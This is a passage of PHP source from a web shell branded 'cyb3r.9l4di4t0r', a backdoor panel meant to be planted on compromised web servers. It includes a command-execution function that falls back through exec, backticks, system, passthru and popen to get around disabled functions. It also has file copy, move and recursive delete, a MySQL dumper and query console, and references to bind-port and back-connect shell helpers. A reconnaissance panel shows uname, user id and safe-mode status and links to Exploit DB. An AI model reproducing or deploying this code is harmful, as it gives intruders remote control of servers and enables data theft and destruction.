  625. if (!is_dir(dirname($t))) {mkdir(dirname($t));}
  626. if (is_dir($d))
  627. {
  628. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  629. if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  630. return fs_copy_dir($d,$t);
  631. }
  632. elseif (is_file($d)) {return copy($d,$t);}
  633. else {return FALSE;}
  634. }
  635. }
  636. if (!function_exists("fs_move_dir"))
  637. {
  638. function fs_move_dir($d,$t)
  639. {
  640. $h = opendir($d);
  641. if (!is_dir($t)) {mkdir($t);}
  642. while (($o = readdir($h)) !== FALSE)
  643. {
  644. if (($o != ".") and ($o != ".."))
  645. {
  646. $ret = TRUE;
  647. if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  648. else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
  649. if (!$ret) {return $ret;}
  650. }
  651. }
  652. closedir($h);
  653. return TRUE;
  654. }
  655. }
  656. if (!function_exists("fs_move_obj"))
  657. {
  658. function fs_move_obj($d,$t)
  659. {
  660. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  661. $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  662. if (is_dir($d))
  663. {
  664. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  665. if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  666. return fs_move_dir($d,$t);
  667. }
  668. elseif (is_file($d))
  669. {
  670. if(copy($d,$t)) {return unlink($d);}
  671. else {unlink($t); return FALSE;}
  672. }
  673. else {return FALSE;}
  674. }
  675. }
  676. if (!function_exists("fs_rmdir"))
  677. {
  678. function fs_rmdir($d)
  679. {
  680. $h = opendir($d);
  681. while (($o = readdir($h)) !== FALSE)
  682. {
  683. if (($o != ".") and ($o != ".."))
  684. {
  685. if (!is_dir($d.$o)) {unlink($d.$o);}
  686. else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  687. }
  688. }
  689. closedir($h);
  690. rmdir($d);
  691. return !is_dir($d);
  692. }
  693. }
  694. if (!function_exists("fs_rmobj"))
  695. {
  696. function fs_rmobj($o)
  697. {
  698. $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
  699. if (is_dir($o))
  700. {
  701. if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  702. return fs_rmdir($o);
  703. }
  704. elseif (is_file($o)) {return unlink($o);}
  705. else {return FALSE;}
  706. }
  707. }
  708. if (!function_exists("myshellexec"))
  709. {
  710. function myshellexec($cmd)
  711. {
  712. global $disablefunc;
  713. $result = "";
  714. if (!empty($cmd))
  715. {
  716. if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  717. elseif (($result = `$cmd`) !== FALSE) {}
  718. elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  719. elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  720. elseif (is_resource($fp = popen($cmd,"r")))
  721. {
  722. $result = "";
  723. while(!feof($fp)) {$result .= fread($fp,1024);}
  724. pclose($fp);
  725. }
  726. }
  727. return $result;
  728. }
  729. }
  730. if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
  731. if (!function_exists("view_perms"))
  732. {
  733. function view_perms($mode)
  734. {
  735. if (($mode & 0xC000) === 0xC000) {$type = "s";}
  736. elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  737. elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  738. elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  739. elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  740. elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  741. elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  742. else {$type = "?";}
  743. $owner["read"] = ($mode & 00400)?"r":"-";
  744. $owner["write"] = ($mode & 00200)?"w":"-";
  745. $owner["execute"] = ($mode & 00100)?"x":"-";
  746. $group["read"] = ($mode & 00040)?"r":"-";
  747. $group["write"] = ($mode & 00020)?"w":"-";
  748. $group["execute"] = ($mode & 00010)?"x":"-";
  749. $world["read"] = ($mode & 00004)?"r":"-";
  750. $world["write"] = ($mode & 00002)? "w":"-";
  751. $world["execute"] = ($mode & 00001)?"x":"-";
  752. if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  753. if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  754. if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  755. return $type.join("",$owner).join("",$group).join("",$world);
  756. }
  757. }
  758. if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
  759. if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
  760. if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
  761. if (!function_exists("parse_perms"))
  762. {
  763. function parse_perms($mode)
  764. {
  765. if (($mode & 0xC000) === 0xC000) {$t = "s";}
  766. elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
  767. elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
  768. elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
  769. elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
  770. elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
  771. elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
  772. else {$t = "?";}
  773. $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
  774. $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
  775. $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
  776. return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  777. }
  778. }
  779. if (!function_exists("parsesort"))
  780. {
  781. function parsesort($sort)
  782. {
  783. $one = intval($sort);
  784. $second = substr($sort,-1);
  785. if ($second != "d") {$second = "a";}
  786. return array($one,$second);
  787. }
  788. }
  789. if (!function_exists("view_perms_color"))
  790. {
  791. function view_perms_color($o)
  792. {
  793. if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
  794. elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
  795. else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
  796. }
  797. }
  798. if (!function_exists("cyb3rgetsource"))
  799. {
  800. function cyb3rgetsource($fn)
  801. {
  802. global $cyb3r_sourcesurl;
  803. $array = array(
  804. "cyb3r_bindport.pl" => "cyb3r_bindport_pl.txt",
  805. "cyb3r_bindport.c" => "cyb3r_bindport_c.txt",
  806. "cyb3r_backconn.pl" => "cyb3r_backconn_pl.txt",
  807. "cyb3r_backconn.c" => "cyb3r_backconn_c.txt",
  808. "cyb3r_datapipe.pl" => "cyb3r_datapipe_pl.txt",
  809. "cyb3r_datapipe.c" => "cyb3r_datapipe_c.txt",
  810. );
  811. }
  812. }
  813. if (!function_exists("mysql_dump"))
  814. {
  815. function mysql_dump($set)
  816. {
  817. global $shver;
  818. $sock = $set["sock"];
  819. $db = $set["db"];
  820. $print = $set["print"];
  821. $nl2br = $set["nl2br"];
  822. $file = $set["file"];
  823. $add_drop = $set["add_drop"];
  824. $tabs = $set["tabs"];
  825. $onlytabs = $set["onlytabs"];
  826. $ret = array();
  827. $ret["err"] = array();
  828. if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  829. if (empty($db)) {$db = "db";}
  830. if (empty($print)) {$print = 0;}
  831. if (empty($nl2br)) {$nl2br = 0;}
  832. if (empty($add_drop)) {$add_drop = TRUE;}
  833. if (empty($file))
  834. {
  835. $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
  836. }
  837. if (!is_array($tabs)) {$tabs = array();}
  838. if (empty($add_drop)) {$add_drop = TRUE;}
  839. if (sizeof($tabs) == 0)
  840. {
  841. // retrive tables-list
  842. $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  843. if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  844. }
  845. $out = "# Dumped by cyb3rell.SQL v. ".$shver."
  846. # Home page: http://ccteam.ru
  847. #
  848. # Host settings:
  849. # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
  850. # Date: ".date("d.m.Y H:i:s")."
  851. # DB: \"".$db."\"
  852. #---------------------------------------------------------
  853. ";
  854. $c = count($onlytabs);
  855. foreach($tabs as $tab)
  856. {
  857. if ((in_array($tab,$onlytabs)) or (!$c))
  858. {
  859. if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  860. // recieve query for create table structure
  861. $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  862. if (!$res) {$ret["err"][] = mysql_smarterror();}
  863. else
  864. {
  865. $row = mysql_fetch_row($res);
  866. $out .= $row["1"].";\n\n";
  867. // recieve table variables
  868. $res = mysql_query("SELECT * FROM `$tab`", $sock);
  869. if (mysql_num_rows($res) > 0)
  870. {
  871. while ($row = mysql_fetch_assoc($res))
  872. {
  873. $keys = implode("`, `", array_keys($row));
  874. $values = array_values($row);
  875. foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  876. $values = implode("', '", $values);
  877. $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  878. $out .= $sql;
  879. }
  880. }
  881. }
  882. }
  883. }
  884. $out .= "#---------------------------------------------------------------------------------\n\n";
  885. if ($file)
  886. {
  887. $fp = fopen($file, "w");
  888. if (!$fp) {$ret["err"][] = 2;}
  889. else
  890. {
  891. fwrite ($fp, $out);
  892. fclose ($fp);
  893. }
  894. }
  895. if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  896. return $out;
  897. }
  898. }
  899. if (!function_exists("mysql_buildwhere"))
  900. {
  901. function mysql_buildwhere($array,$sep=" and",$functs=array())
  902. {
  903. if (!is_array($array)) {$array = array();}
  904. $result = "";
  905. foreach($array as $k=>$v)
  906. {
  907. $value = "";
  908. if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  909. $value .= "'".addslashes($v)."'";
  910. if (!empty($functs[$k])) {$value .= ")";}
  911. $result .= "`".$k."` = ".$value.$sep;
  912. }
  913. $result = substr($result,0,strlen($result)-strlen($sep));
  914. return $result;
  915. }
  916. }
  917. if (!function_exists("mysql_fetch_all"))
  918. {
  919. function mysql_fetch_all($query,$sock)
  920. {
  921. if ($sock) {$result = mysql_query($query,$sock);}
  922. else {$result = mysql_query($query);}
  923. $array = array();
  924. while ($row = mysql_fetch_array($result)) {$array[] = $row;}
  925. mysql_free_result($result);
  926. return $array;
  927. }
  928. }
  929. if (!function_exists("mysql_smarterror"))
  930. {
  931. function mysql_smarterror($type,$sock)
  932. {
  933. if ($sock) {$error = mysql_error($sock);}
  934. else {$error = mysql_error();}
  935. $error = htmlspecialchars($error);
  936. return $error;
  937. }
  938. }
  939. if (!function_exists("mysql_query_form"))
  940. {
  941. function mysql_query_form()
  942. {
  943. global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
  944. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  945. if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  946. if ((!$submit) or ($sql_act))
  947. {
  948. echo "<table border=0><tr><td><form name=\"cyb3r_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
  949. if ($tbl_struct)
  950. {
  951. echo "<td valign=\"top\"><b>Fields:</b><br>";
  952. foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.cyb3r_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
  953. echo "</td></tr></table>";
  954. }
  955. }
  956. if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  957. }
  958. }
  959. if (!function_exists("mysql_create_db"))
  960. {
  961. function mysql_create_db($db,$sock="")
  962. {
  963. $sql = "CREATE DATABASE `".addslashes($db)."`;";
  964. if ($sock) {return mysql_query($sql,$sock);}
  965. else {return mysql_query($sql);}
  966. }
  967. }
  968. if (!function_exists("mysql_query_parse"))
  969. {
  970. function mysql_query_parse($query)
  971. {
  972. $query = trim($query);
  973. $arr = explode (" ",$query);
  974. /*array array()
  975. {
  976. "METHOD"=>array(output_type),
  977. "METHOD1"...
  978. ...
  979. }
  980. if output_type == 0, no output,
  981. if output_type == 1, no output if no error
  982. if output_type == 2, output without control-buttons
  983. if output_type == 3, output with control-buttons
  984. */
  985. $types = array(
  986. "SELECT"=>array(3,1),
  987. "SHOW"=>array(2,1),
  988. "DELETE"=>array(1),
  989. "DROP"=>array(1)
  990. );
  991. $result = array();
  992. $op = strtoupper($arr[0]);
  993. if (is_array($types[$op]))
  994. {
  995. $result["propertions"] = $types[$op];
  996. $result["query"] = $query;
  997. if ($types[$op] == 2)
  998. {
  999. foreach($arr as $k=>$v)
  1000. {
  1001. if (strtoupper($v) == "LIMIT")
  1002. {
  1003. $result["limit"] = $arr[$k+1];
  1004. $result["limit"] = explode(",",$result["limit"]);
  1005. if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
  1006. unset($arr[$k],$arr[$k+1]);
  1007. }
  1008. }
  1009. }
  1010. }
  1011. else {return FALSE;}
  1012. }
  1013. }
  1014. if (!function_exists("cyb3rfsearch"))
  1015. {
  1016. function cyb3rfsearch($d)
  1017. {
  1018. global $found;
  1019. global $found_d;
  1020. global $found_f;
  1021. global $search_i_f;
  1022. global $search_i_d;
  1023. global $a;
  1024. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  1025. $h = opendir($d);
  1026. while (($f = readdir($h)) !== FALSE)
  1027. {
  1028. if($f != "." && $f != "..")
  1029. {
  1030. $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
  1031. if (is_dir($d.$f))
  1032. {
  1033. $search_i_d++;
  1034. if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
  1035. if (!is_link($d.$f)) {cyb3rfsearch($d.$f);}
  1036. }
  1037. else
  1038. {
  1039. $search_i_f++;
  1040. if ($bool)
  1041. {
  1042. if (!empty($a["text"]))
  1043. {
  1044. $r = @file_get_contents($d.$f);
  1045. if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
  1046. if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
  1047. if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
  1048. else {$bool = strpos(" ".$r,$a["text"],1);}
  1049. if ($a["text_not"]) {$bool = !$bool;}
  1050. if ($bool) {$found[] = $d.$f; $found_f++;}
  1051. }
  1052. else {$found[] = $d.$f; $found_f++;}
  1053. }
  1054. }
  1055. }
  1056. }
  1057. closedir($h);
  1058. }
  1059. }
  1060. if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
  1061. //Sending headers
  1062. @ob_start();
  1063. @ob_implicit_flush(0);
  1064. function onphpshutdown()
  1065. {
  1066. global $gzipencode,$ft;
  1067. if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
  1068. {
  1069. $v = @ob_get_contents();
  1070. @ob_end_clean();
  1071. @ob_start("ob_gzHandler");
  1072. echo $v;
  1073. @ob_end_flush();
  1074. }
  1075. }
  1076. function cyb3rexit()
  1077. {
  1078. onphpshutdown();
  1079. exit;
  1080. }
  1081. if (empty($tmpdir))
  1082. {
  1083. $tmpdir = ini_get("upload_tmp_dir");
  1084. if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
  1085. }
  1086. $tmpdir = realpath($tmpdir);
  1087. $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
  1088. if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
  1089. if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
  1090. else {$tmpdir_logs = realpath($tmpdir_logs);}
  1091. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  1092. {
  1093. $safemode = TRUE;
  1094. $hsafemode = "<font color=green>ON (secure)</font>";
  1095. $sfmode = "<font color=green><b>ON (secure)</b></font>";
  1096. }
  1097. else {$safemode = FALSE; $hsafemode = "<font color=red>OFF (not secure)</font>"; $sfmode = "<font color=red><b>OFF (not secure)</b></font>";}
  1098. $v = @ini_get("open_basedir");
  1099. if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
  1100. else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
  1101. $sort = htmlspecialchars($sort);
  1102. if (empty($sort)) {$sort = $sort_default;}
  1103. $sort[1] = strtolower($sort[1]);
  1104. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  1105. if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
  1106. $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),'[<a href="http://www.google.com/search?q='.$kernel.' '. $release.'" target=_blank ><b><u><font color="red">Google</font></u></b></a>]',htmlspecialchars($DISP_SERVER_SOFTWARE));
  1107. @ini_set("highlight.bg",$highlight_bg); //FFFFFF
  1108. @ini_set("highlight.comment",$highlight_comment); //#FF8000
  1109. @ini_set("highlight.default",$highlight_default); //#0000BB
  1110. @ini_set("highlight.html",$highlight_html); //#000000
  1111. @ini_set("highlight.keyword",$highlight_keyword); //#007700
  1112. @ini_set("highlight.string",$highlight_string); //#DD0000
  1113. if (!is_array($actbox)) {$actbox = array();}
  1114. $dspact = $act = htmlspecialchars($act);
  1115. $disp_fullpath = $ls_arr = $notls = null;
  1116. $ud = urlencode($d);
  1117. ?>
  1118. <center>
  1119. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
  1120. <tr>
  1121. <td><center><p><a href="?"><img src="http://s15.postimage.org/5oskuq363/image.png" height="68px" width="66px" border="0px"/></a><br />cyb3r.9l4di4t0r<br /><?php echo $shver; ?> </p></center></td>
  1122. <td width="90%">
  1123. <TABLE style="BORDER-COLLAPSE: collapse" borderColorDark=#c0c0c0 cellPadding=3 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=0>
  1124. <tr>
  1125. <td width="9%" ><b>Software :</b></td>
  1126. <td ><b><?php echo $DISP_SERVER_SOFTWARE.' [<a href="'.$expltlink.'" target=_blank><b><u><font color="yellow">Exploit DB</font></u></b></a>]'; ?></b></td>
  1127. <td width="9%"><?php echo "<a href=\"".$surl."act=serverinfo\" ><b><u>Server</u> I.P.</b></a>"?></td>
  1128. <td width="9%"><b><?php echo getenv('SERVER_ADDR'); ?></b></td>
  1129. </tr>
  1130. <tr>
  1131. <td width="9%" ><?php echo "<a href=\"".$surl."act=security\" ><b><u>Uname-a</u> :</b></a>"?></td>
  1132. <td ><b><?php echo wordwrap(php_uname(),90,"<br>",1); ?></b></td>
  1133. <td width="9%"><?php echo "<a href=\"".$surl."act=clientinfo\" ><b><u>Client</u> I.P.</b></a>"?></td>
  1134. <td width="9%"><b><?php echo $_SERVER['REMOTE_ADDR']; ?></b></td>
  1135. </tr>
  1136. <tr>
  1137. <td width="9%" ><?php echo "<a href=\"".$surl."act=processes\" ><b><u>Username</u> :</b></a>"?></td>
  1138. <td ><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b></td>
  1139. <td width="9%"><?php echo "<a href=\"".$surl."act=systeminfo\" ><b><u>Sys</u>tem<u>info</u></b></a>"?></td>
  1140. <td width="9%"></td>
  1141. </tr>
  1142. <tr>
  1143. <td width="9%" ><b>Safe Mode :</b></td>
  1144. <td ><b><?php echo $hsafemode; ?></b></td>
  1145. <td width="9%"><b></b></td>
  1146. <td width="9%"></td>
  1147. </tr>
  1148. <tr>
  1149. <td width="9%" ><b>Directory :</b></td>
  1150. <td ><b>
  1151. <?php
  1152. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  1153. if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
  1154. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  1155. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  1156. $d = str_replace("\\\\","\\",$d);
  1157. $dispd = htmlspecialchars($d);
  1158. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
  1159. $i = 0;
  1160. foreach($pd as $b)
  1161. {
  1162. $t = "";
  1163. $j = 0;
  1164. foreach ($e as $r)
  1165. {
  1166. $t.= $r.DIRECTORY_SEPARATOR;
  1167. if ($j == $i) {break;}
  1168. $j++;
  1169. }
  1170. echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
  1171. $i++;
  1172. }
  1173. echo "&nbsp;&nbsp;&nbsp;";
  1174. if (is_writable($d))
  1175. {
  1176. $wd = TRUE;
  1177. $wdt = "<font color=green>[ ok ]</font>";
  1178. echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
  1179. }
  1180. else
  1181. {
  1182. $wd = FALSE;
  1183. $wdt = "<font color=red>[ Read-Only ]</font>";
  1184. echo "<b>".view_perms_color($d)."</b>";
  1185. }
  1186. ?>
  1187. </b></td>
  1188. <td width="9%"><?php echo "<a href=\"".$surl."act=selfremove\" ><b><font color='orange'>Self <u>Remove</u></font></b></a>"?></td>
  1189. <td width="9%"></td>
  1190. </tr>
  1191. <tr>
  1192. <td width="9%" ><b>Free Space :</b></td>
  1193. <td ><b>
  1194. <?php if (is_callable("disk_free_space"))
  1195. {
  1196. $free = disk_free_space($d);
  1197. $total = disk_total_space($d);
  1198. if ($free === FALSE) {$free = 0;}
  1199. if ($total === FALSE) {$total = 0;}
  1200. if ($free < 0) {$free = 0;}
  1201. if ($total < 0) {$total = 0;}
  1202. $used = $total-$free;
  1203. $free_percent = round(100/($total/$free),2);
  1204. echo "<b>".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
  1205. }?>
  1206. </b></td>
  1207. <td width="9%"><?php echo "<a href=\"".$surl."act=feedback\" ><b>Feed<u>back</u></b></a>"?></td>
  1208. <td width="9%"></td>
  1209. </tr>
  1210. <tr>
  1211. <td width="9%" ><b>Drives :</b></td>
  1212. <td ><b>
  1213. <?php $letters = "";
  1214. if ($win)
  1215. {
  1216. $v = explode("\\",$d);
  1217. $v = $v[0];
  1218. foreach (range("a","z") as $letter)
  1219. {
  1220. $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  1221. if (!$bool) {$bool = is_dir($letter.":\\");}
  1222. if ($bool)
  1223. {
  1224. $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
  1225. if ($letter.":" != $v) {$letters .= $letter;}
  1226. else {$letters .= "<font color=green>".$letter."</font>";}
  1227. $letters .= " ]</a> ";
  1228. }
  1229. }
  1230. if (!empty($letters)) {echo $letters."<br>";}
  1231. }
  1232. ?></b></td>
  1233. <td width="9%"><a href="<?php echo $self.'?logout'?>"><b><font color='green'>I'm <u>Out</u> !</font></b></a></td>
  1234. <td width="9%"></td>
  1235. </tr>
  1236. </table>
  1237. </td>
  1238. </tr>
  1239. </table>
  1240. <TABLE style="BORDER-COLLAPSE: collapse" height="1" cellSpacing=0 borderColorDark=#c0c0c0 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1>
  1241. <tr><td width="100%" valign="top">
  1242. ADMIN: <?php echo $_SERVER['SERVER_ADMIN'];?> <font color="silver">|</font>
  1243. PHP : <?php echo "<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>".$phpVersion."</u></b></a>"?> <font color="silver">|</font>
  1244. Curl : <?php echo function_exists('curl_version')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
  1245. Oracle : <?php echo function_exists('ocilogon')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
  1246. MySQL : <?php echo function_exists('mysql_connect')?("<font color='red'>Enabled</font>"):("Disabled");?> <font color="silver">|</font>
  1247. MSSQL : <?php echo function_exists('mssql_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
  1248. PostgreSQL : <?php echo function_exists('pg_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
  1249. Disable functions : <?php getDisabledFunctions(); ?>
  1250. </td></tr>
  1251. </table>
  1252. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#c0c0c0 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
  1253. <tr><td width="100%" valign="top">
  1254. <?php
  1255. if (count($quicklaunch) > 0)
  1256. {
  1257. foreach($quicklaunch as $item)
  1258. {
  1259. $item[1] = str_replace("%d",urlencode($d),$item[1]);
  1260. $item[1] = str_replace("%sort",$sort,$item[1]);
  1261. $v = realpath($d."..");
  1262. if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  1263. $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  1264. echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
  1265. }
  1266. }?>
  1267. </td>
  1268. </tr>
  1269. </table><br>
  1270. <?php
  1271. if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
  1272. echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
  1273. if ($act == "") {$act = $dspact = "ls";}
  1274. if ($act == "sql")
  1275. {
  1276. $sql_surl = $surl."act=sql";
  1277. if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  1278. if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  1279. if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  1280. if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  1281. if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  1282. $sql_surl .= "&";
  1283. ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3>
  1284. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
  1285. if ($sql_server)
  1286. {
  1287. $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  1288. $err = mysql_smarterror();
  1289. @mysql_select_db($sql_db,$sql_sock);
  1290. if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
  1291. }
  1292. else {$sql_sock = FALSE;}
  1293. echo "<b>SQL Manager:</b><br>";
  1294. if (!$sql_sock)
  1295. {
  1296. if (!$sql_server) {echo "NO CONNECTION";}
